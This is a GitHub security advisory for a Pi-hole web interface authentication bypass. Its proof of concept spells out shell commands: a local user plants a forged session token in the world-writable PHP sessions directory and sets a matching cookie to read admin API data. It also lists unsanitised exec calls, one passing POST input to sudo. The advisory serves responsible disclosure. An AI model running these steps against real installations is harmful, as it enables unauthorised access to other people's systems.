Skip to content

Pi-hole: Web Authentication ByPass

High
rcorrea35 published GHSA-3658-w6j3-w42r Sep 6, 2024

Package

Pi-hole (Debian)

Affected versions

v5.18.3 v5.18.4 v5.19 v5.20 v5.20.1 v5.20.2 v5.21

Patched versions

None

Description

Summary

Web authentication bypass with local system access via world writable permissions.

Severity

High - Allows attackers to bypass web authentication.

Proof of Concept

Local System Users can bypass Web Interface Authentication

It’s possible for a local user (non-root & non-pihole) to write to /var/lib/php/sessions to bypass the web interface’s login page.

root@2f496b742755:/# apt update && apt install curl -y
root@2f496b742755:/# useradd -m -s /bin/bash test
root@2f496b742755:/# su - test
test@2f496b742755:~$ curl 'localhost/admin/api.php?status&versions='
{"core_update":false,"web_update":false,"FTL_update":false,"docker_update":false,"core_current":"v5.17.1","web_current":"v5.20.1","FTL_current":"v5.23","docker_current":"2023.05.2","core_latest":"v5.17.1","web_latest":"v5.20.1","FTL_latest":"v5.23","docker_latest":"2023.05.2","core_branch":"master","web_branch":"master","FTL_branch":"master"}
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
test@2f496b742755:~$ UMASK=0777 echo 1689793078 > /var/lib/php/sessions/ph_plt_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
{"network":[{"id":1,"hwaddr":"02:42:28:c7:59:64","interface":"eth2","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.1"],"name":[""]},{"id":2,"hwaddr":"00:00:00:00:00:00","interface":"lo","firstSeen":1689191102,"lastQuery":1689191140,"numQueries":4,"macVendor":"virtual interface","aliasclient_id":null,"ip":["127.0.0.1"],"name":["localhost"]},{"id":3,"hwaddr":"02:42:0a:00:05:03","interface":"eth1@if127","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.5.3"],"name":[""]},{"id":4,"hwaddr":"02:42:ac:12:00:03","interface":"eth2@if129","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.3"],"name":[""]},{"id":5,"hwaddr":"02:42:0a:00:00:0f","interface":"eth0@if131","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.15"],"name":[""]},{"id":6,"hwaddr":"02:42:0a:00:00:06","interface":"eth0","firstSeen":1689191160,"lastQuery":1689191146,"numQueries":3,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.6"],"name":[""]},{"id":7,"hwaddr":"ip-::","interface":"N\/A","firstSeen":1689191160,"lastQuery":1689191140,"numQueries":14,"macVendor":"","aliasclient_id":null,"ip":["::"],"name":["pi.hole"]}],"message_count":0}

From the Chrome console a user can simply set a peristentlogin cookie to "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and refresh the page.
poc_web

Note it's the Debian php package itself that sets /var/lib/php/sessions permissions as world writable.

root@f612b9a22be3:/# apt update && apt install php -y 
root@f612b9a22be3:/# ls -ld /var/lib/php/sessions/
drwx-wx-wt 2 root root 4096 Jul 13  2022 /var/lib/php/sessions/

Further Analysis

Most system calls use pihole_execute() which wrap commands with escapeshellcmd(). There are a few system calls however that do not wrap escapeshellcmd().

# grep exec\( -R AdminLTE/*.php | grep -v pihole_execute | grep -v stmt
AdminLTE/settings.php:    $timezone = shell_exec("date +'%Z'");
AdminLTE/settings.php:    $FTLversion = exec('/usr/bin/pihole-FTL version');

# grep exec\( -R AdminLTE/scripts/pi-hole/php/*.php  | grep -v '$db'
AdminLTE/scripts/pi-hole/php/func.php:    exec($command, $output, $return_status);
AdminLTE/scripts/pi-hole/php/func.php:    return shell_exec('pidof pihole-FTL');
AdminLTE/scripts/pi-hole/php/func.php:    return trim(exec('ps -p '.$FTLpid.' -o '.$arg));
AdminLTE/scripts/pi-hole/php/header_authenticated.php:$nproc = shell_exec('nproc');
AdminLTE/scripts/pi-hole/php/savesettings.php:                    exec('sudo pihole -a theme '.$_POST['webtheme']);
AdminLTE/scripts/pi-hole/php/teleporter.php:        exit('cannot open/create '.htmlentities($archive_file_name)."<br>\nPHP user: ".exec('whoami')."\n");

Timeline

Date reported: 07/14/2023
Date fixed:
Date disclosed: 09/06/2024

Severity

High

CVE ID

No known CVE

Weaknesses

No CWEs

Credits